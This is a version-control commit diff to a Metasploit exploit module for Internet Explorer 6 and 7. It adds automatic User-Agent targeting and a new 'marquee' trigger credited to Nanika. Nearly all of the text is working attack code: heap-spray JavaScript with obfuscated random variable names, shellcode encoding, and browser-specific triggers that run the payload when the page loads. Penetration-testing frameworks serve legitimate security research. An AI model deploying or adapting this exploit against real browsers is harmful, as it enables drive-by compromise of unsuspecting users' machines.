add reliable IE7 trigger from Nanika

git-svn-id: file:///home/svn/framework3/trunk@8935 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-03-27 01:31:19 +00:00
parent 3dc30aeed6
commit 79e277450a
1 changed files with 102 additions and 12 deletions

View File

@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
'unknown', # original discovery
'Trancer <mtrancer[at]gmail.com>', # metasploit module
'Nanika', # HIT2010 IE7 reliable PoC
'jduck' # minor cleanups
],
'Version' => '$Revision$',
@ -72,22 +73,73 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
{
'Method' => 'automatic'
}
],
[ 'IE 6 SP0-SP2 (onclick)',
{
'Method' => 'onclick',
'Ret' => 0x0C0C0C0C
}
],
# "A great celebration of HIT2010" - http://www.hitcon.org/
[ 'IE 7.0 (marquee)',
{
'Method' => 'marquee',
'Ret' => 0x0C0C0C0C
}
],
],
'DisclosureDate' => 'Mar 09 2010',
'DefaultTarget' => 0))
end
def auto_target(cli, request)
mytarget = nil
agent = request.headers['User-Agent']
#print_status("Checking user agent: #{agent}")
if agent =~ /Windows NT 6\.0/
mytarget = targets[2] # IE7 on Vista
elsif agent =~ /MSIE 7\.0/
mytarget = targets[2] # IE7 on XP and 2003
elsif agent =~ /MSIE 6\.0/
mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
else
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
end
mytarget
end
def on_request_uri(cli, request)
if target['Method'] == 'automatic'
mytarget = auto_target(cli, request)
if (not mytarget)
send_not_found(cli)
return
end
else
mytarget = target
end
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
# Set the return\nops
ret = Rex::Text.to_unescape([target.ret].pack('V'))
ret = Rex::Text.to_unescape([mytarget.ret].pack('V'))
# Randomize the javascript variable names
j_shellcode = rand_text_alpha(rand(100) + 1)
@ -103,7 +155,10 @@ class Metasploit3 < Msf::Exploit::Remote
j_object = rand_text_alpha(rand(100) + 1)
j_id = rand_text_alpha(rand(100) + 1)
# Build out the message
# Construct the final page
case mytarget['Method']
when 'onclick'
html = %Q|<html><body>
<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
<script language='javascript'>
@ -136,7 +191,42 @@ document.getElementById('#{j_id}').onclick();
</script></body></html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
when 'marquee'
j_attrib = rand_text_alpha(6);
html = %Q|<html>
<head>
<style type="text/css">
.#{j_object} {behavior: url(#default#userData);}
</style>
</head>
<script>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}() {
#{j_function1}();
for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
#{j_id}.setAttribute("#{j_attrib}",document.location);
}
#{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
}
</script>
<body onload="#{j_function2}();"></body>
<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
</html>
|
end
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })